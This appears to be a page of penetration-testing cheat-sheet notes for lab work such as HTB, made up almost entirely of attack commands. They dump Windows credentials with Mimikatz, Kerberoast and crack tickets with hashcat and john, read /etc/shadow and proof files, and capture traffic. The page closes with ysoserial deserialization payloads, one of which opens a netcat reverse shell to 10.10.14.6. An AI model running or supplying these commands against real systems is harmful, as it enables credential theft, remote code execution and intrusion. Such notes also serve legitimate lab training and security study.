Invoke-Mimikatz -DumpCreds -ComputerName XOR-APP59  

Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"'

Ticket Grabbing:

net use \\dc01 #Creates a TGS with a domain user

sekurlsa::tickets  #Run with mimikatz
sekurlsa::tickets /export

PS C:\Users\Public\Documents> klist  
#klist dumps tickets in powershell

Invoke-Kerberoast.ps1 to dump tickets:

Import-Module .\Invoke-Kerberoast.ps1

Next type: PS C:\Users\Public> Invoke-Kerberoast.ps1

Grabbing ticket hashes for hashcat:

Invoke-Kerberoast -OutputFormat Hashcat | % {$_.Hash} | Out-File -Encoding ascii hashes.hashcat

hashcat -m 13100 -a 0 -o cracked.txt hashes.hashcat /home/kali/rockyou.txt  
##Use SMBserver to transfer hashes

Grabbing tickets for john:

PS C:\Tools\active_directory> Invoke-Kerberoast -OutputFormat john | Select-Object -ExpandProperty hash |% {$_.replace(':',':$krb5tgs$23$')}

sudo john --format=krb5tgs hash.txt --wordlist=/home/kali/rockyou.txt  
#Use SMBserver to transfer hashes

🎩Loot🎩

LINUX:

# Proof
echo -e '\n'HOSTNAME:   && hostname && echo -e '\n'WHOAMI:   && whoami && echo -e '\n'PROOF:  && cat proof.txt && echo -e '\n'IFCONFIG:  && /sbin/ifconfig && echo -e '\n'PASSWD:  && cat /etc/passwd && echo -e '\n'SHADOW:  && cat /etc/shadow && echo -e '\n'NETSTAT:  && netstat -antup

# Local
find / -type f -name local.txt 2>/dev/null
cat local.txt

# Network secret
/root/network-secret.txt

# Passwords and hashes
cat /etc/passwd
cat /etc/shadow

unshadow passwd shadow > unshadowed.txt
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

# Dualhomed
ifconfig
ifconfig -a
arp -a

# Tcpdump
tcpdump -i any -s0 -w capture.pcap
tcpdump -i eth0 -w capture -n -U -s 0 src not 10.11.1.111 and dst not 10.11.1.111
tcpdump -vv -i eth0 src not 10.11.1.111 and dst not 10.11.1.111

WINDOWS:

# Proof: 
hostname && whoami.exe && type proof.txt && ipconfig /all

PS C:\Users\administrator.xor\Desktop> hostname; whoami.exe; type proof.txt; ipconfig /all

# Passwords and hashes: 
wce32.exe -w
wce64.exe -w
fgdump.exe

# Dualhomed
ipconfig /all
route print
# What other machines have been connected
arp -a

# Tcpdump
Meterpreter
run packetrecorder -li
run packetrecorder -i 1


- Interesting files:
- Databases:
- SSH-keys:
- Browser:
- Mail:

🎩EXPLOITS🎩

ysoserial A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. Deserialization payload generator for a variety of .NET formatters

GitHub - frohoff/ysoserial: A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.GitHub

Releases · pwntester/ysoserial.netGitHub

Deserialization risks in use of BinaryFormatter and related types - .NETMicrosoftLearn

Open your Windows virtual machine, download ysoserial.exe here

cd to that folder, paste the payload in the below syntax, and hit enter:

.\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "powershell -e PAYLOAD" --path="/portfolio/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"

.\ysoserial.exe -f BinaryFormatter -g AxHostState -o base64 -c "C:\\programdata\\nc64.exe 10.10.14.6 444 -e cmd.exe"

HTB LABS:

BURP LABS:

Insecure deserialization | Web Security AcademyWebSecAcademy

PreviousSQL Injection NextStarting Point

Last updated 1 year ago